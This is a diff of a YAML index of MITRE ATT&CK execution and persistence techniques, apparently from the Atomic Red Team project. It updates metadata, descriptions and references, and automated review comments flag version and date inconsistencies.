+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests: []
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1204.003:
technique:
x_mitre_platforms:
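Review bot: the new T1059.011 (Lua) block ends with `atomic_tests: []` but has no `identifier: T1059.011` line, whereas the T1559 object directly above it carries `identifier: T1559`; several other objects in this patch (T1059.008, T1204, T1203) also lack the field, so either it is optional in this format or the generator is emitting it inconsistently, and that should be settled one way. Inside the added Lua description, the lines `), or from Lua-embedded programs (through the struct lua_State` and `).(Citation: Lua main page)(Citation: Lua state)` appear without a `+` marker in an otherwise all-added block, which suggests inline markup was stripped when the text was produced; verify the literal block is a single well-formed scalar in the file. Dropping `x_mitre_permissions_required` (`Administrator`, `User`, `SYSTEM`) from T1559 matches what was done for T1569.001 earlier.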
@@ -26459,7 +26838,7 @@ execution:
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
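Review bot: same backwards `modified` move as T1059.008 earlier, here for T1204.003 (`2022-04-25T14:00:00.188Z` to `2021-08-26T16:42:35.318Z`), and in the next hunk this object's `x_mitre_attack_spec_version: 2.1.0` is deleted with no `3.2.0` replacement visible; check that these two techniques were not regenerated from a stale bundle.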
@@ -26486,30 +26865,12 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests: []
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
@@ -26526,9 +26887,10 @@ execution:
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -26536,21 +26898,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
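Review bot: For T1203 this hunk adds two data sources (`'File: File Modification'`, `'Network Traffic: Network Traffic Flow'`) and the object's `modified` date jumps from 2022-05-11 to 2024-10-15, yet `x_mitre_version` is removed and re-added as the same `'1.4'`. Content changes normally come with a version bump, so verify this state against the upstream ATT&CK bundle rather than assuming the regeneration is clean; a merge that pulled data sources from one bundle and version metadata from another would look exactly like this.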
@@ -26600,28 +26978,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests: []
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
@@ -26632,32 +26993,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
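Review bot: The removal of `x_mitre_permissions_required` (`User`, `Administrator`, `SYSTEM`, `root`) from T1569 has no replacement field, and the patch leaves the same key in place on objects still at attack spec 2.1.0 further down (T1546.006 keeps a `- User` entry just before its `x_mitre_attack_spec_version: 2.1.0`). Any consumer of this index that reads `x_mitre_permissions_required` must now tolerate both its presence and its absence across objects; check the doc and CSV index generators for that key before merging.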
@@ -26700,12 +27073,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests: []
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26762,11 +27134,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26831,14 +27202,13 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests: []
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26859,14 +27229,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
@@ -26875,16 +27250,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
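Review bot: The platform rename `Office 365` to `Office Suite` for T1648 (with the `x_mitre_version` bump from `'1.0'` to `'1.1'`) silently changes which per-platform index this technique lands in. Anything that selects techniques by the literal string `Office 365` will drop T1648, and a new `Office Suite` bucket will appear with no existing index file behind it. Make sure the platform-to-index mapping is updated in the same change, or the technique disappears from the office index without any error.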
@@ -26910,6 +27287,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -26924,29 +27309,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
@@ -26959,25 +27325,41 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
and [Net](https://attack.mitre.org/software/S0039).
@@ -27027,17 +27409,16 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -27100,7 +27481,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -27134,8 +27515,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -27144,6 +27525,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
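Review bot: The new `Malicious Life by Cybereason` reference carries a `#blog-subscribe` fragment on its URL (`https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe`), which targets the newsletter widget rather than the article, and its author line is dated `(n.d.)` although a retrieval date is given. This file is regenerated from the ATT&CK bundle, so do not hand-edit it here; report the fragment upstream so the next regeneration picks up the clean URL.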
@@ -27156,29 +27541,29 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
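Review bot: The rewritten T1053.005 description no longer contains the removed sentence about the deprecated `at` utility (`The deprecated [at](...) utility could also be abused by adversaries ... though at.exe can not access tasks created with schtasks or the Control Panel.`); the added text goes straight from the `Invoke-CimMethod` / `PS_ScheduledTask` sentence to `An adversary may use Windows Task Scheduler to execute programs at system startup`. The lone unchanged-context line `can not access tasks created with schtasks` between the two removed runs looks like a rendering split of that removed sentence rather than surviving text, so confirm the upstream description really drops the `at.exe` paragraph and that this is not a truncated regeneration.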
@@ -27225,7 +27610,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -27257,8 +27642,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27272,6 +27657,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
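Review bot: The added `Red Canary - Atomic Red Team` reference points at this repository's own page (`.../blob/master/atomics/T1053.005/T1053.005.md`), so ATT&CK now cites the atomic for the `Invoke-CimMethod` / `PS_ScheduledTask` behaviour described in the T1053.005 text, and the link tracks `master` rather than a pinned commit. Nothing to change in this index, but future edits to T1053.005.md should keep that atomic in place, or the upstream citation will point at a page that no longer supports the sentence.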
@@ -27284,16 +27673,19 @@ persistence:
